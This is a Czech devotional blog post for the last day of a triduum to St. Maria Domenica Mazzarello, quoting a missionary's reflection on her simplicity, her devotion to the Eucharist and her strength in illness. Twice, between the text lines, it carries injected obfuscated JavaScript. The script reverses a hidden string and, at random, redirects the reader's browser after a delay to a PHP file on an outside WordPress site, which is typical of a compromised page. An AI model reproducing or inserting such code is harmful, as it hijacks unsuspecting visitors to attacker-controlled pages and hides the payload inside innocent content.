3. den tridua k MDM

V poslední den tridua nás zdraví z daleké Kuby naše misionářka Olga Landrová a posílá třetí zamyšlení o Marii Dominice Mazzarellové.

“Na Marii Dominice mě oslovují především tři vlastnosti.

  • Tou první je jednoduchost ve zbožnosti. Její hluboký vztah s Bohem ji přirozeně stimuluje ke službě druhým.
  • Druhou je její vztah k Eucharistii. V eucharistickém Ježíši nachází veškerou životní sílu a hloubka jejího vztahu k eucharistickému Ježíši je měřítkem hloubky ve vztahu s druhými.
  • Třetí vlastnost, která mě na ní inspiruje, je schopnost překonávat překážky a proměnit slabost ve ctnost. Po těžké nemoci je schopná přeorientovat svou životní cestu a její ztracená fyzická síla se promění v sílu radosti a plného odevzdání se do Božího vedení.”
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Odvahu a velkou důvěru v Boha a ducha pokory a uvidíte, že všechno půjde dobře
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>PS: A zítra nezapomeňte Marii Dominiku oslavit! Ať už modlitbou, dobrým jídlem, sdílením s příteli, eucharistií, žasnutím nad přírodou…